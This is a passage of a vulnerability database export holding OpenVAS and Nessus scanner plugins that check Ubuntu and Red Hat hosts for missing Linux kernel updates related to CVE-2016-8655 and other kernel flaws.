"AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8655"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-12-06T00:00:00", "id": "OPENVAS:1361412562310842985", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842985", "type": "openvas", "title": "Ubuntu Update for linux USN-3150-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-3150-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842985\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-06 05:39:47 +0100 (Tue, 06 Dec 2016)\");\n script_cve_id(\"CVE-2016-8655\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3150-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Philip Pettersson discovered a race condition in the af_packet\nimplementation in the Linux kernel. A local unprivileged attacker could use\nthis to cause a denial of service (system crash) or run arbitrary code with\nadministrative privileges.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3150-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3150-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-118-generic\", ver:\"3.2.0-118.161\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-118-generic-pae\", ver:\"3.2.0-118.161\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-118-highbank\", ver:\"3.2.0-118.161\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-118-omap\", ver:\"3.2.0-118.161\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-118-powerpc-smp\", ver:\"3.2.0-118.161\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-118-powerpc64-smp\", ver:\"3.2.0-118.161\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-118-virtual\", ver:\"3.2.0-118.161\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"3.2.0.118.133\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-pae\", ver:\"3.2.0.118.133\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-highbank\", ver:\"3.2.0.118.133\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-omap\", ver:\"3.2.0.118.133\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"3.2.0.118.133\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"3.2.0.118.133\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-virtual\", ver:\"3.2.0.118.133\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8655"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-12-06T00:00:00", "id": "OPENVAS:1361412562310842988", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842988", "type": "openvas", "title": "Ubuntu Update for linux-ti-omap4 USN-3150-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-ti-omap4 USN-3150-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842988\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-06 05:39:51 +0100 (Tue, 06 Dec 2016)\");\n script_cve_id(\"CVE-2016-8655\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-3150-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-ti-omap4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Philip Pettersson discovered a race condition in the af_packet\nimplementation in the Linux kernel. A local unprivileged attacker could use\nthis to cause a denial of service (system crash) or run arbitrary code with\nadministrative privileges.\");\n script_tag(name:\"affected\", value:\"linux-ti-omap4 on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3150-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3150-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-1496-omap4\", ver:\"3.2.0-1496.123\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-omap4\", ver:\"3.2.0.1496.91\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8655"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-12-06T00:00:00", "id": "OPENVAS:1361412562310842979", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842979", "type": "openvas", "title": "Ubuntu Update for linux USN-3152-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-3152-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842979\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-06 05:39:42 +0100 (Tue, 06 Dec 2016)\");\n script_cve_id(\"CVE-2016-8655\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3152-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Philip Pettersson discovered a race condition in the af_packet\nimplementation in the Linux kernel. A local unprivileged attacker could use\nthis to cause a denial of service (system crash) or run arbitrary code with\nadministrative privileges.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3152-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3152-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.10\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-30-generic\", ver:\"4.8.0-30.32\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-30-generic-lpae\", ver:\"4.8.0-30.32\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-30-lowlatency\", ver:\"4.8.0-30.32\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-30-powerpc-e500mc\", ver:\"4.8.0-30.32\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-30-powerpc-smp\", ver:\"4.8.0-30.32\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-30-powerpc64-emb\", ver:\"4.8.0-30.32\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.8.0.30.39\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.8.0.30.39\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.8.0.30.39\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"4.8.0.30.39\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"4.8.0.30.39\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"4.8.0.30.39\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T05:07:10", "description": "An update for kernel-rt is now available for Red Hat Enterprise Linux\n7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which\nenables fine-tuning for systems with extremely high determinism\nrequirements.\n\nSecurity Fix(es) :\n\n* Linux kernel built with the Kernel-based Virtual Machine\n(CONFIG_KVM) support is vulnerable to a NULL pointer dereference flaw.\nIt could occur on x86 platform, when emulating an undefined\ninstruction. An attacker could use this flaw to crash the host kernel\nresulting in DoS. (CVE-2016-8630, Important)\n\n* A race condition issue leading to a use-after-free flaw was found in\nthe way the raw packet sockets implementation in the Linux kernel\nnetworking subsystem handled synchronization while creating the\nTPACKET_V3 ring buffer. A local user able to open a raw packet socket\n(requires the CAP_NET_RAW capability) could use this flaw to elevate\ntheir privileges on the system. (CVE-2016-8655, Important)\n\n* A flaw was discovered in the Linux kernel's implementation of VFIO.\nAn attacker issuing an ioctl can create a situation where memory is\ncorrupted and modify memory outside of the expected area. This may\noverwrite kernel memory and subvert kernel execution. (CVE-2016-9083,\nImportant)\n\n* The use of a kzalloc with an integer multiplication allowed an\ninteger overflow condition to be reached in vfio_pci_intrs.c. This\ncombined with CVE-2016-9083 may allow an attacker to craft an attack\nand use unallocated memory, potentially crashing the machine.\n(CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting\nCVE-2016-8655.\n\nBug Fix(es) :\n\n* Previously, the asynchronous page fault woke code references\nspinlocks, which were actually sleeping locks in the RT kernel.\nBecause of this, when the code was executed from the exception\ncontext, a bug warning appeared on the console. With this update, the\nregular wait queue and spinlock code in this area has been modified to\nuse simple-wait-queue and raw-spinlocks. This code change enables the\nasynchronous page fault code to run in a non-preemptable state without\nbug warnings. (BZ#1418035)", "edition": 28, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-03T00:00:00", "title": "RHEL 7 : kernel-rt (RHSA-2017:0387)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8655", "CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-kvm", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-kvm", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-kvm", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-devel", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-kvm-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-kvm-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-kvm-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-debuginfo"], "id": "REDHAT-RHSA-2017-0387.NASL", "href": "https://www.tenable.com/plugins/nessus/97510", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:0387. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97510);\n script_version(\"3.11\");\n script_cvs_date(\"Date: 2019/10/24 15:35:42\");\n\n script_cve_id(\"CVE-2016-8630\", \"CVE-2016-8655\", \"CVE-2016-9083\", \"CVE-2016-9084\");\n script_xref(name:\"RHSA\", value:\"2017:0387\");\n\n script_name(english:\"RHEL 7 : kernel-rt (RHSA-2017:0387)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel-rt is now available for Red Hat Enterprise Linux\n7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which\nenables fine-tuning for systems with extremely high determinism\nrequirements.\n\nSecurity Fix(es) :\n\n* Linux kernel built with the Kernel-based Virtual Machine\n(CONFIG_KVM) support is vulnerable to a NULL pointer dereference flaw.\nIt could occur on x86 platform, when emulating an undefined\ninstruction. An attacker could use this flaw to crash the host kernel\nresulting in DoS. (CVE-2016-8630, Important)\n\n* A race condition issue leading to a use-after-free flaw was found in\nthe way the raw packet sockets implementation in the Linux kernel\nnetworking subsystem handled synchronization while creating the\nTPACKET_V3 ring buffer. A local user able to open a raw packet socket\n(requires the CAP_NET_RAW capability) could use this flaw to elevate\ntheir privileges on the system. (CVE-2016-8655, Important)\n\n* A flaw was discovered in the Linux kernel's implementation of VFIO.\nAn attacker issuing an ioctl can create a situation where memory is\ncorrupted and modify memory outside of the expected area. This may\noverwrite kernel memory and subvert kernel execution. (CVE-2016-9083,\nImportant)\n\n* The use of a kzalloc with an integer multiplication allowed an\ninteger overflow condition to be reached in vfio_pci_intrs.c. This\ncombined with CVE-2016-9083 may allow an attacker to craft an attack\nand use unallocated memory, potentially crashing the machine.\n(CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting\nCVE-2016-8655.\n\nBug Fix(es) :\n\n* Previously, the asynchronous page fault woke code references\nspinlocks, which were actually sleeping locks in the RT kernel.\nBecause of this, when the code was executed from the exception\ncontext, a bug warning appeared on the console. With this update, the\nregular wait queue and spinlock code in this area has been modified to\nuse simple-wait-queue and raw-spinlocks. This code change enables the\nasynchronous page fault code to run in a non-preemptable state without\nbug warnings. (BZ#1418035)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:0387\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8630\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8655\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9083\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9084\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AF_PACKET chocobo_root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-kvm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-kvm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-kvm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-8630\", \"CVE-2016-8655\", \"CVE-2016-9083\", \"CVE-2016-9084\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2017:0387\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:0387\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-debuginfo-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-devel-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-kvm-3.10.0-514.10.2.rt56.435.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", 